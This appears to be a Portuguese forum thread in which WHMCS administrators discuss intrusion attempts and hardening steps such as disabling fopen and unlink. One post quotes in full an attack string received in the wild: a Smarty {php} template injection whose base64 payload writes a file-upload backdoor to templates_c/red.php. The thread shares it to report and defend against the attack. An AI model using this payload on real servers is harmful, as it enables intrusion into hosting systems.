Ir para conteúdo
  • Cadastre-se

Tentativas de invasão em meu WHMCS


Posts Recomendados

Reversível não, porque esse tem o base64_encode e base64_decode. Os outros são md5, sha1 e crypt (acho que é isso) mas eles não podem ser revertidos, por isso não podem ser usados para esse fim.

Desabilitei a fopen para que não possam abrir arquivos e a unlink para que não removam o arquivo php.ini ou os .htaccess.

Link para o comentário
Compartilhar em outros sites

Reversível não, porque esse tem o base64_encode e base64_decode. Os outros são md5, sha1 e crypt (acho que é isso) mas eles não podem ser revertidos, por isso não podem ser usados para esse fim.

Desabilitei a fopen para que não possam abrir arquivos e a unlink para que não removam o arquivo php.ini ou os .htaccess.

O FOPEN aqui é desabilitado a muito tempo em todos os servidores. O unlink é uma boa ideia implementar, não afeta em nada os demais scripts.

Vou testar aqui.

Link para o comentário
Compartilhar em outros sites

Recebi uma tentativa hoje mais cedo também:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})

De imediato, informei ao suporte WHMCS.. Fui respondido com a seguinte resposta:

Hi Cassiano,

The patch we released last week was designed to protect this so providing you have applied that there is no need for concern: http://forum.whmcs.com/showthread.php?t=43462

If you can, please post this on the forum thread you refer to if nobody else has already because unfortunately we can't understand the language posted there, but there is no risk from these attempts if you have applied the patch we released over a week ago for it.

Regards,

Matt

-------

Forums: http://forums.whmcs.com/

Documentation: http://docs.whmcs.com/

----------------------------------------------

Ticket ID: #512446

Mais eu tinha atualizado no mesmo dia que saiu essa atualização.. Assim como muitos amigos aqui também ja tenham atualizado, mesmo assim teve essa tentativa..

Inclusive informei a eles o link deste tópico, ressaltando que muitos usuários estavam sofrendo o mesmo ataque..

Link para o comentário
Compartilhar em outros sites

Recebi uma tentativa hoje mais cedo também:

De imediato, informei ao suporte WHMCS.. Fui respondido com a seguinte resposta:

Mais eu tinha atualizado no mesmo dia que saiu essa atualização.. Assim como muitos amigos aqui também ja tenham atualizado, mesmo assim teve essa tentativa..

Inclusive informei a eles o link deste tópico, ressaltando que muitos usuários estavam sofrendo o mesmo ataque..

No caso o que a WHMCS diz é:

Se vc já atualizou o seu WHMCS com o pack de segurança, desconsidere, pois é so uma tentativa, mais como ja fez a correção, e so ignorar

Link para o comentário
Compartilhar em outros sites

Visitante
Este tópico está impedido de receber novos posts.
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?